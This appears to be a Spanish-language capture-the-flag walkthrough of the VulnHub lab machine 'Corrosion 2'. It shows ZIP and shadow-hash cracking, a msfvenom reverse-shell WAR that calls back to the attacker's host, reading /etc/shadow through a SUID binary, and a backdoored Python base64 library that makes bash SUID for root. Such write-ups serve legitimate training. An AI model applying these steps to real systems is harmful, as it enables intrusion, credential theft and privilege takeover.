Corrosion 2

Sobre esta maquina: VulnHub

Sistema Operativo: Linux

Skills Usados:

Note: On this machine we have configured an internal network to Pivot to Corrosion 1
Web Enumeration
Information Leakage + Cracking ZIP File
Abusing Tomcat - Creating a malicious WAR file [RCE]
Abusing SUID Binary - Reading privileged files
Cracking Hashes
Manipulating the code of a Python library with incorrectly configured permissions [Privilege Escalation]
EXTRA: Pivoting Lab with Corrosion 1

Metodologia:

Escaneo en Nmap:

// 
❯ nmap -p- -n -T5 --open 192.168.1.142

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-05 22:32 EDT
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 51.76% done; ETC: 22:32 (0:00:05 remaining)
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.67% done; ETC: 22:32 (0:00:01 remaining)
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 97.08% done; ETC: 22:32 (0:00:00 remaining)
Nmap scan report for 192.168.1.142
Host is up (0.00100s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open proxy
MAC Address: 00:0C:29:6C:73:2D (VMware)

Realizamos escaneo de Scripts y versiones:

// 
❯ nmap -p22,80,8080 -sVC -T5 192.168.1.142 -oN sV_scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-05 22:35 EDT
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 22:35 (0:00:06 remaining)
Nmap scan report for 192.168.1.142
Host is up (0.00054s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6a:d8:44:60:80:39:7e:f0:2d:08:2f:e5:83:63:f0:70 (RSA)
| 256 f2:a6:62:d7:e7:6a:94:be:7b:6b:a5:12:69:2e:fe:d7 (ECDSA)
|_ 256 28:e1:0d:04:80:19:be:44:a6:48:73:aa:e8:6a:65:44 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
8080/tcp Tomcat http-proxy
MAC Address: 00:0C:29:6C:73:2D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Vemos que corre por el puerto 80:

Utilizamos Gobuster para encontrar subdominios:

// 
❯ gobuster dir -u http://192.168.1.142/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://192.168.1.142/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
Starting gobuster in directory enumeration mode
/server-status (Status: 403) [Size: 278]
Progress: 220560 / 220561 (100.00%)
Finished

No conseguimos nada, intentaremos por el puerto 8080

// 
❯ gobuster dir -u http://192.168.1.142/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -x zip, txt
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://192.168.1.142/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
Starting gobuster in directory enumeration mode
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/backup.zip (Status: 200) [Size: 33723]
/readme.txt (Status: 200) [Size: 153]
/manager (Status: 302) [Size: 0] [--> /manager/]
Finished

Conseguimos un archivo de backups y un txt, los revisamos (captura):

El readme dice: " Hey randy! It's your System Administrator. I left you a file on the server, I'm sure nobody will find it. Also remember to use that password I gave you."

Ahora intentaremos descomprimir el Backup, pero tiene password, asi que intentaremos crackearlo con jhontheriper:(captura)

// 
❯ zip2john backup.zip

Created directory: /root/.john
ver 2.0 efh 5455 efh 7875 backup.zip/catalina.policy PKZIP Encr: TS_chk, cmplen=2911, decmplen=13052, crc=AD0C6FDB ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/context.xml PKZIP Encr: TS_chk, cmplen=721, decmplen=1400, crc=59B9F4E7 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/catalina.properties PKZIP Encr: TS_chk, cmplen=2210, decmplen=7276, crc=1CD3C095 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/jaspic-providers.xml PKZIP Encr: TS_chk, cmplen=626, decmplen=1149, crc=748A87A6 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/jaspic-providers.xsd PKZIP Encr: TS_chk, cmplen=862, decmplen=2313, crc=3B44D150 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/logging.properties PKZIP Encr: TS_chk, cmplen=1076, decmplen=4144, crc=1D6C26F7 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/server.xml PKZIP Encr: TS_chk, cmplen=2609, decmplen=7589, crc=F91AC0C0 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/tomcat-users.xml PKZIP Encr: TS_chk, cmplen=1167, decmplen=2972, crc=BDCB08B9 ts=B0E3 cs=b0e3 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/tomcat-users.xsd PKZIP Encr: TS_chk, cmplen=858, decmplen=2558, crc=E8F588C2 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/web.xml PKZIP Encr: TS_chk, cmplen=18917, decmplen=172359, crc=B8AF6070 ts=6920 cs=6920 type=8
backup.zip:$pkzip$81108246920948f83df8e3188341e0c4ced81b85ffe507a30f1c8bb3d60d228d81ba45b3044c40d51f41082469206af6b41285729172215c7a912286e6312228c5142b6e537384c0ad6b9a6e40b2de98422e108246920d042ed9f0787c684de489fd42ddd00403556c0caaeeabff6ca78e998731732959a1a7adf108246920034f00f26675d81f70f7de491b1c645f15032c9ab52aa2c6157156996a72a9a6a138c8e610824b0e39f16689c61f4dc5fb5405d409a9c4814354c0dba919313e1903a9580daa135342c46fea31082469207046a2cc2a19fdf9e44c52bdd3b1a9d458ca7e751d2ec883c4d808c79087fb2606344d591082469206ae99725253d7986459879f818798e0fe14dd1a533635704c24831f0acbceab71f99b2842027247d748a87a617dd4e82726920502768ce9a11db8105560cdc8ea3b12cb91e5fa10d15b79fdc5335826c2f4a6e4112818ff5cce6e766548eef59eafabd29a2c2de3308487c980603b3867bb62bb60e65451a1fd9bb068ff01a4c2e98a8bbb56dd0f392338b147324bbd34ab2e63d2b80882029705f3803ead22980591ea52cab28fad58ad94838283fd7e267478f9a3e7f645f60ca4d0a227cef99c3db46184f8521dc4dd30f4102ad006dd04a7d054a9018f55730511ccd34bd15a50ebbd1012d4ba320b23fa925ede6d62e3929c137b959813290f0bf0e2a9ca075d1b6b511fb525a5289c32d29365132e25432f855f982f37e4a5fde6901e8f889218d987067920133a4b26ceecc5f3d28f40cb33601cff6f803b0eb900a183ef9e13d7e888fc9770fdb9d01ced0c6969f5df03fdce418da1d979220b430bee9dc21fa63f33b2c1f7b99f848ca5b618d0b6d6eb56ec3748595f1ca1c01492d6464fd1cf73ecd92b6bea1bccc9b8795b1d6087e9205b8e6c5122f83e3625c145b563e1763578d002e0feea455a19d74831c64f69440a3cbcb7b679f683c238984873b7a80df997f11e5d924fe98d1baef30bfce5efb613e82eab136e3844b0e326508b1dac80b2f863b35efdbfa95138d9994699da813c8bb8bc4e7c885b851db53f85d8f1d39f32dfda36477a64821ea03e444866882c6b64d446feb650780e26fab3701fd0743ac26cacefde996ccfe538776ea101c1d3aec81660613bd65eb34569139ee0845e7f7d1e8b12f8ed43ef58e9580c58ab2cfe170981c72256b4b12cc152771546d0ea9077d368c3ddc2c63819b00b3dd3581ab8908561cd8ad722c21d9a891922d8b52444f4fca9278a1a96e926cf19125ec20a327e8a3ab0aa2b05d4348*$/pkzip$::backup.zip:jaspic-providers.xml, context.xml, tomcat-users.xsd, jaspic-providers.xsd, logging.properties, tomcat-users.xml, catalina.properties, server.xml:backup.zip
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

❯ zip2john backup.zip > hash

ver 2.0 efh 5455 efh 7875 backup.zip/catalina.policy PKZIP Encr: TS_chk, cmplen=2911, decmplen=13052, crc=AD0C6FDB ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/context.xml PKZIP Encr: TS_chk, cmplen=721, decmplen=1400, crc=59B9F4E7 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/catalina.properties PKZIP Encr: TS_chk, cmplen=2210, decmplen=7276, crc=1CD3C095 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/jaspic-providers.xml PKZIP Encr: TS_chk, cmplen=626, decmplen=1149, crc=748A87A6 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/jaspic-providers.xsd PKZIP Encr: TS_chk, cmplen=862, decmplen=2313, crc=3B44D150 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/logging.properties PKZIP Encr: TS_chk, cmplen=1076, decmplen=4144, crc=1D6C26F7 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/server.xml PKZIP Encr: TS_chk, cmplen=2609, decmplen=7589, crc=F91AC0C0 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/tomcat-users.xml PKZIP Encr: TS_chk, cmplen=1167, decmplen=2972, crc=BDCB08B9 ts=B0E3 cs=b0e3 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/tomcat-users.xsd PKZIP Encr: TS_chk, cmplen=858, decmplen=2558, crc=E8F588C2 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/web.xml PKZIP Encr: TS_chk, cmplen=18917, decmplen=172359, crc=B8AF6070 ts=6920 cs=6920 type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

❯ cat hash

───────┬────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: hash
───────┼────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 backup.zip:$pkzip$81108246920948f83df8e3188341e0c4ced81b85ffe507a30f1c8bb3d60d228d81ba45b3044c40d51f4108246
9206af6b41285729172215c7a912286e6312228c5142b6e537384c0ad6b9a6e40b2de98422e108246920d042ed9f0787c684de489fd42ddd
00403556c0caaeeabff6ca78e998731732959a1a7adf108246920034f00f26675d81f70f7de491b1c645f15032c9ab52aa2c6157156996a72
a9a6a138c8e610824b0e39f16689c61f4dc5fb5405d409a9c4814354c0dba919313e1903a9580daa135342c46fea31082469207046a
2cc2a19fdf9e44c52bdd3b1a9d458ca7e751d2ec883c4d808c79087fb2606344d591082469206ae99725253d7986459879f818798e0fe14dd
│ 1a533635704c24831f0acbceab71f99b2842027247d748a87a617dd4e82726920502768ce9a11db8105560cdc8ea3b12cb91e5fa10d1
│ 5b79fdc5335826c2f4a6e4112818ff5cce6e766548eef59eafabd29a2c2de3308487c980603b3867bb62bb60e65451a1fd9bb068ff01a4c2e98a8bb
│ b56dd0f392338b147324bbd34ab2e63d2b80882029705f3803ead22980591ea52cab28fad58ad94838283fd7e267478f9a3e7f645f60ca4d0a227ce
│ f99c3db46184f8521dc4dd30f4102ad006dd04a7d054a9018f55730511ccd34bd15a50ebbd1012d4ba320b23fa925ede6d62e3929c137b959813290
│ f0bf0e2a9ca075d1b6b511fb525a5289c32d29365132e25432f855f982f37e4a5fde6901e8f889218d987067920133a4b26ceecc5f3d28f40cb3360
│ 1cff6f803b0eb900a183ef9e13d7e888fc9770fdb9d01ced0c6969f5df03fdce418da1d979220b430bee9dc21fa63f33b2c1f7b99f848ca5b618d0b
│ 6d6eb56ec3748595f1ca1c01492d6464fd1cf73ecd92b6bea1bccc9b8795b1d6087e9205b8e6c5122f83e3625c145b563e1763578d002e0feea455a
│ 19d74831c64f69440a3cbcb7b679f683c238984873b7a80df997f11e5d924fe98d1baef30bfce5efb613e82eab136e3844b0e326508b1dac80b2f86
│ 3b35efdbfa95138d9994699da813c8bb8bc4e7c885b851db53f85d8f1d39f32dfda36477a64821ea03e444866882c6b64d446feb650780e26fab370
│ 1fd0743ac26cacefde996ccfe538776ea101c1d3aec81660613bd65eb34569139ee0845e7f7d1e8b12f8ed43ef58e9580c58ab2cfe170981c72256b
│ 4b12cc152771546d0ea9077d368c3ddc2c63819b00b3dd3581ab8908561cd8ad722c21d9a891922d8b52444f4fca9278a1a96e926cf19125ec20a32
│ 7e8a3ab0aa2b05d4348*$/pkzip$::backup.zip:jaspic-providers.xml, context.xml, tomcat-users.xsd, jaspic-providers.xsd, log
│ ging.properties, tomcat-users.xml, catalina.properties, server.xml:backup.zip

Ya con el hash obtenido terminamos de realizar un ataque de fuerza bruta para obtener el password en texto claro:

// 
❯ john --wordlist=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
@administrator_hi5 (backup.zip)
1g 0:00:00:05 DONE (2025-05-05 23:48) 0.1949g/s 2240Kp/s 2240Kc/s 2240KC/s @lexus1s..<3missrusby<3
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Conseguimos la password, @administrator_hi5, ahora intentaremos descomprimir el backup.zip:

❯ unzip backup.zip

Archive: backup.zip
[backup.zip] catalina.policy password:
inflating: catalina.policy
inflating: context.xml
inflating: catalina.properties
inflating: jaspic-providers.xml
inflating: jaspic-providers.xsd
inflating: logging.properties
inflating: server.xml
inflating: tomcat-users.xml
inflating: tomcat-users.xsd
inflating: web.xml

❯ ls

 backup.zip  context.xml  jaspic-providers.xsd  tomcat-users.xml
 catalina.policy  hash  logging.properties  tomcat-users.xsd
 catalina.properties  jaspic-providers.xml  server.xml  web.xml

❯ cat tomcat-users.xml

Dentro de tomcat-users encontramos usuario y password de una dministrador en texto claro, username="manager" password="melehifokivai" roles="manager-gui" :

Con las credenciales obtenidas intentaremos logearnos: (capturas)

Hemos ingresado, ahora crearemos un archivo .war malicioso que nos pueda permitir ganar acceso total al sistema, para esto usaremos msfvenom:

// 
❯ msfvenom -p java/shell_reverse_tcp LHOSTS:192.168.1.136 LPORT:443 -f war -o reverse.war

Payload size: 13033 bytes
Final size of war file: 13033 bytes
Saved as: reverse.war

❯ ls
 reverse.war

Ya con el payload creado solo debemos subirlo al servidor y ponernos en escucha en el puerto que queramos:

Lo logramos, estamos dentro, ahora busquemos las flags:

// 
whoami
tomcat

cd /

ls
bin
boot
cdrom
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swapfile
sys
tmp
usr
var

cd home

ls
jaye
randy

cd randy

ls
Desktop
Documents
Downloads
Music
note.txt
Pictures
Public
randombase64.py
Templates
user.txt
Videos

cat user.txt
ca73a018ae6908a7d0ea5d1c269ba4b6

Obtuvimos la primera bandera, pero no somos root y esta maquina en particular esta creada para pivotear hacia otra, así que con un script, intentaremos tener bash dentro del sistema:

// 
script /dev/null -c bash
ctrl + z
stty raw -echo;fg
reset xterm
tomcat@corrosion:/home/randy$

Ya tenemos la Bash completa y la flag de randy, pero el sistema no nos deja entrar a jaye, probaremos con las passwords anteriores a ver si hay reutilizacion:

// 
tomcat@corrosion:/home/randy$ su jaye
Password:

$ bash

Estamos dentro, en Jaye no encontramos nada tan interesante a excepcion de un binario que nos puede indicar como podemos escalar privilegios:

// 
jaye@corrosion:~$ ls

Desktop Downloads Music Public Templates
Documents Files Pictures snap Videos

jaye@corrosion:~$ cd Files

jaye@corrosion:~/Files$ ls

look

Con este binario podemos listar los hashes de otros usuarios ,edoamte /etc/shadow para despues crackearlos con John, usando el comando ./look:

// 
jaye@corrosion:~/Files$ LFILE=/etc/shadow

jaye@corrosion:~/Files$ ./look '' $LFILE

randy:$6$bQ8rY/73PoUA4lFX$i/aKxdkuh5hF8D78k50BZ4eInDWklwQgmmpakv/gsuzTodngjB340R1wXQ8qWhY2cyMwi.61HJ36qXGvFHJGY/:18888:0:99999:7:::

Conseguimos el hash de Randy, lo podemos crackear con john:

// 
File: hash
───────┼────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ $6$bQ8rY/73PoUA4lFX$i/aKxdkuh5hF8D78k50BZ4eInDWklwQgmmpakv/gsuzTodngjB340R1wXQ8qWhY2cyMwi.61HJ36qXGvFHJGY/:18888:0:9999
│ 9:7:::

john — wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Cracked Password: 07051986randy

Con la nueva password nos logeamos por ssh:

// 
ssh randy@192.168.1.142

The authenticity of host '192.168.1.142 (192.168.1.142)' can't be established.
ED25519 key fingerprint is SHA256:zKtKAXyhL0euYM1nLav6ZWVRGZ4c2NxUZ+mMIU3VImg.
This key is not known by any other names.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added '192.168.1.142' (ED25519) to the list of known hosts.

randy@192.168.1.142's password:

Entramos, Ahora el objetivo es escalar privilegios:

// 
randy@corrosion:~$ ls - l

total 44
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Desktop
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Documents
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Downloads
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Music
-rw-r--r-- 1 root root 283 Sep 20 2021 note.txt
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Pictures
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Public
-rwxr-xr-x 1 root root 210 Sep 20 2021 randombase64.py
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Templates
-rw-rw-r-- 1 randy randy 33 Sep 17 2021 user.txt
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Videos

Nos damos cuenta que randy puede ejecutar scripts en Python, asi que podemos buscar el origen de la libreria y alterarla para ganar privilegios:

// 
randy@corrosion:/$ find / -name base64.py 2>/dev/null

/snap/core18/2128/usr/lib/python3.6/base64.py
/snap/core18/2855/usr/lib/python3.6/base64.py
/snap/gnome-3-34-1804/93/usr/lib/python2.7/base64.py
/snap/gnome-3-34-1804/93/usr/lib/python3.6/base64.py
/snap/gnome-3-34-1804/72/usr/lib/python2.7/base64.py
/snap/gnome-3-34-1804/72/usr/lib/python3.6/base64.py
/usr/lib/python3.8/base64.py (esta es la libreria original)

randy@corrosion:/$ nano /usr/lib/python3.8/base64.py

Creamos un Script nuevo para ejecutarlo y ganar privilegios aprovechandonos de la libreria de Origen:

// 
Modified 22-May-2007 by Guido van Rossum to use bytes everywhere Modified

import re
import struct
import binascii
import os

os.system("chmod u+s /bin/bash") (agregamos esta linea para obtener bash root)
all_ = [
# Legacy interface exports traditional RFC 2045 Base64 encodings
^G G'encode', 'decode', 'encodebytes', 'decodebytes',J Justify ^C Cur P^X # Generalized interface for other encodings Text^T To Spell ^_ Go To Li 'b85encode', 'b85decode', 'a85encode', 'a85decode',
# Standard Base64 encoding
'standard_b64encode', 'standard_b64decode',

Ejecutamos el Script:

// 
randy@corrosion:/$ sudo /usr/bin/python3.8 /home/randy/randombase64.py 

Enter your string: hacked (colocamos cualquier string)
aGFja2Vk

randy@corrosion:/$ whoami

randy

randy@corrosion:/$ bash -p (ejeuctamos bash con privilegios)

bash-5.0# whoami

root

Hemos ganado acceso ahora buscamos la siguiente flag:

// 
bash-5.0# cd /root

bash-5.0# ls

root.txt snap

bash-5.0# cat root.txt

2fdbf8d4f894292361d6c72c8e833a4b

Una vez hemos ganado privilegios, intentaremos pivotiar hacia Corrosion 1, para ver como lo lograremos debes irte a ese writeup, esta maquina la damos por terminada.

PreviousICA: 1 NextVenom 1

Last updated 19 days ago